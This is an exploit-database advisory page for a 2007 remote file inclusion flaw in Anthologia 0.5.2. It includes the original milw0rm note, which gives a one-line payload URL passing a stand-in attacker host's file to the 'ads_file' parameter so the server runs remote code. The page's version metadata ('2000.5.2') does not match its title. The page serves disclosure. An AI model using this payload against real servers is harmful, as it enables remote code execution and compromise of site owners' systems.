header-logo
Suggest Exploit
vendor:
Anthologia
by:
Dj7xpl
N/A
CVSS
MEDIUM
Remote File Inclusion Vuln
CWE
Product Name: Anthologia
Affected Version From: 2000.5.2
Affected Version To: 2000.5.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

ANTHOLOGIA 0.5.2

The Anthologia 0.5.2 software is vulnerable to remote file inclusion. The vulnerability can be exploited by an attacker by including a malicious file using the 'ads_file' parameter in the index.php page. This allows the attacker to execute arbitrary code on the target server.

Mitigation:

To mitigate this vulnerability, users are advised to update to a patched version of Anthologia or apply necessary security measures to prevent remote file inclusion attacks.
Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                      ANTHOLOGIA 0.5.2 
-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

* Author :   Dj7xpl / Dj7xpl[at]Yahoo[dot]com
* Type :     Remote File Inclusion Vuln
* Download:  http://www.dbfweb.com/download/anthologia-last.tgz
* Page:      http://www.dbfweb.com/anthology.htm
* Vuln:      index.php?ads_file=http://[EvilSite]/Evil.txt

-=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# milw0rm.com [2007-04-17]